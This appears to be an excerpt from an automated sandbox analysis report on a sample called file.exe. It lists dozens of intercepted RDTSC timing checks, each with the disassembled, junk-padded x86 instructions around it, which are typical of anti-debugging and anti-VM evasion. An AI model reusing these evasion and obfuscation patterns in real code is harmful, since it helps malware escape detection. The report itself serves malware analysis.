Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B6EA second address: 107B6F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B6F3 second address: 107B6F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B9A4 second address: 107B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107BB2E second address: 107BB3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F86385196D6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107BB3B second address: 107BB6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F863914EA37h 0x00000008 jmp 00007F863914EA2Fh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB6B second address: 107BB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB6F second address: 107BB73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BB73 second address: 107BBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F86385196FDh 0x0000000e push esi 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F86385196E9h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E38D second address: 107E391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E454 second address: 107E4E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F86385196D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F86385196DEh 0x00000013 push esi 0x00000014 jbe 00007F86385196D6h 0x0000001a pop esi 0x0000001b nop 0x0000001c mov edi, 60A8FFA5h 0x00000021 push 00000000h 0x00000023 call 00007F86385196E9h 0x00000028 pushad 0x00000029 add ch, 00000012h 0x0000002c stc 0x0000002d popad 0x0000002e pop edx 0x0000002f xor edx, dword ptr [ebp+122D1ACCh] 0x00000035 push 36E69605h 0x0000003a push esi 0x0000003b jmp 00007F86385196E4h 0x00000040 pop esi 0x00000041 xor dword ptr [esp], 36E69685h 0x00000048 cld 0x00000049 push 00000003h 0x0000004b mov dword ptr [ebp+122D2B8Ch], esi 0x00000051 push 00000000h 0x00000053 mov edi, 331C7D2Dh 0x00000058 push 00000003h 0x0000005a mov si, cx 0x0000005d push B765FE60h 0x00000062 push eax 0x00000063 push edx 0x00000064 jnl 00007F86385196DCh 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E55E second address: 107E562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E562 second address: 107E568 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E568 second address: 107E5A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1BB4h], ecx 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 mov edi, dword ptr [ebp+122D1C63h] 0x0000001b mov ecx, dword ptr [ebp+122D3698h] 0x00000021 popad 0x00000022 call 00007F863914EA29h 0x00000027 pushad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5A3 second address: 107E5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F86385196DEh 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5C2 second address: 107E5D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5D2 second address: 107E5DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F86385196D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E5DD second address: 107E63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push esi 0x0000000c jnc 00007F863914EA28h 0x00000012 pop esi 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F863914EA31h 0x0000001b jmp 00007F863914EA37h 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F863914EA37h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E63B second address: 107E67F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 and edx, dword ptr [ebp+122D3768h] 0x0000000f push 00000003h 0x00000011 mov dword ptr [ebp+122D1BA4h], ecx 0x00000017 push 00000000h 0x00000019 ja 00007F86385196DCh 0x0000001f or edx, dword ptr [ebp+122D35E8h] 0x00000025 push 00000003h 0x00000027 mov edx, 5B159238h 0x0000002c push 7A72EF55h 0x00000031 pushad 0x00000032 jmp 00007F86385196DAh 0x00000037 jo 00007F86385196DCh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107E67F second address: 107E6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 458D10ABh 0x0000000c and edx, dword ptr [ebp+122D28F8h] 0x00000012 lea ebx, dword ptr [ebp+124501CCh] 0x00000018 mov edi, dword ptr [ebp+122D27C2h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F863914EA2Fh 0x00000027 push edi 0x00000028 pop edi 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E56E second address: 109E590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86385196E0h 0x00000009 pop edi 0x0000000a jmp 00007F86385196DDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EB4A second address: 109EB53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EB53 second address: 109EB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F86385196D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE1E second address: 109EE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE24 second address: 109EE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F86385196D6h 0x0000000d jno 00007F86385196D6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE37 second address: 109EE50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE50 second address: 109EE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F86385196E0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE66 second address: 109EE7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F863914EA2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F141 second address: 109F17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007F86385196F2h 0x0000000b js 00007F86385196D6h 0x00000011 jmp 00007F86385196E6h 0x00000016 jnc 00007F86385196DCh 0x0000001c jc 00007F86385196DCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2C3 second address: 109F2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2C9 second address: 109F2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2CD second address: 109F2F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA30h 0x00000007 jmp 00007F863914EA31h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F2F6 second address: 109F302 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F86385196D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F302 second address: 109F30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F863914EA26h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F5BC second address: 109F5C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F5C3 second address: 109F5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1096D7E second address: 1096D93 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F86385196DDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1096D93 second address: 1096DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F863914EA37h 0x00000009 ja 00007F863914EA26h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F891 second address: 109F8C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DFh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F86385196E9h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02E0 second address: 10A02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F863914EA38h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A02FC second address: 10A0302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4D3C second address: 10A4D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a jmp 00007F863914EA30h 0x0000000f pop eax 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push ecx 0x00000017 jg 00007F863914EA26h 0x0000001d pop ecx 0x0000001e push ecx 0x0000001f jmp 00007F863914EA35h 0x00000024 pop ecx 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push ecx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4ECE second address: 10A4ED4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4ED4 second address: 10A4EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4EDA second address: 10A4EF3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4EF3 second address: 10A4EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A7494 second address: 10A7499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC5DC second address: 10AC5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F863914EA30h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E428 second address: 106E455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F86385196E5h 0x00000009 jno 00007F86385196DCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106E455 second address: 106E45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB8D6 second address: 10AB8F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F86385196D6h 0x00000009 jbe 00007F86385196D6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jnl 00007F86385196D6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AB8F4 second address: 10AB8FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABC24 second address: 10ABC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a ja 00007F86385196D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABC36 second address: 10ABC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABD95 second address: 10ABDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F86385196D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F86385196E7h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F86385196E7h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABDD2 second address: 10ABDF9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F863914EA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F863914EA36h 0x00000010 jl 00007F863914EA26h 0x00000016 jmp 00007F863914EA2Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABDF9 second address: 10ABDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABDFD second address: 10ABE2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F863914EA39h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC174 second address: 10AC1A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F86385196E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop esi 0x00000010 jbe 00007F86385196FFh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AC1A0 second address: 10AC1BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F863914EA31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F863914EA2Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AD599 second address: 10AD5B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F86385196E0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AD64C second address: 10AD652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADBF6 second address: 10ADBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ADD09 second address: 10ADD0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE277 second address: 10AE27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE379 second address: 10AE37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE37F second address: 10AE383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE51C second address: 10AE522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE8A7 second address: 10AE8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F86385196D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AE8B1 second address: 10AE8E7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F863914EA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F863914EA30h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F863914EA33h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10AEDE7 second address: 10AEE42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86385196DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c stc 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+1247DAC0h], edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F86385196D8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 jmp 00007F86385196E9h 0x00000036 push eax 0x00000037 push ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0974 second address: 10B0978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0127 second address: 10B012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0978 second address: 10B097E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B012B second address: 10B0131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B132D second address: 10B1331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B10E7 second address: 10B10EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1331 second address: 10B134E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F863914EA32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B10EB second address: 10B10F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B134E second address: 10B1353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1353 second address: 10B135D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F86385196D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B135D second address: 10B1361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1361 second address: 10B13CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, dx 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F86385196D8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D3688h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F86385196D8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jnp 00007F86385196D6h 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 push edx 0x00000054 ja 00007F86385196D6h 0x0000005a pop edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B13CE second address: 10B13D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2A1E second address: 10B2A73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F86385196DBh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F86385196E5h 0x00000011 nop 0x00000012 jmp 00007F86385196E0h 0x00000017 push 00000000h 0x00000019 mov esi, edi 0x0000001b push 00000000h 0x0000001d ja 00007F86385196D6h 0x00000023 or esi, dword ptr [ebp+122D3884h] 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007F86385196D8h 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 rdtsc
